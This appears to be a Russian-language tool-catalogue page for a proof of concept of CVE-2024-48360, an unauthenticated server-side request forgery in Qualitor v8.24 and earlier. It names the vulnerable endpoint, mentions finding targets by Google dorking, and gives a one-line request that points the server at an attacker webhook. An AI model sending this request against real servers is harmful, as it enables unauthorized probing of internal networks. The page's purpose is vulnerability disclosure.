Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-48360 — CVE-2024-48360 Poc | Kitploit
Инструменты/GitHubGitHub/openxp-research/cve-2024-48360
РазведкаАнализ уязвимостейЭксплуатацияСбор информацииВеб-безопасность
GitHubopenxp-research/cve-2024-48360

CVE-2024-48360

CVE-2024-48360 Poc

Репозиторий
81 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-48360 | Qualitor <= v8.24 SSRF без аутентификации

CVE-2024-48360 | Qualitor <= v8.24 SSRF без аутентификации

Описание

Qualitor — это платформа для управления бизнес-процессами, которая присутствует в различных компаниях Бразилии и может быть легко найдена с помощью Google dorking.

Наша команда обнаружила в приложении уязвимость, подверженную SSRF, которая позволяет перечислять внутренние системы/порты.

Доказательство концепции (POC)

В Qualitor v8.24 обнаружена уязвимость Server-Side Request Forgery (SSRF) через компонент /request/viewValidacao.php.

Для эксплуатации достаточно отправить запрос на host.com/html/ad/adformmobile/request/viewValidacao.php?url=ATTACKER_WEBHOOK — вы получите запрос с уязвимого сервера.

image

Исследователи

https://www.linkedin.com/in/xvinicius/

  • OpenXP Research Team
Скачать инструмент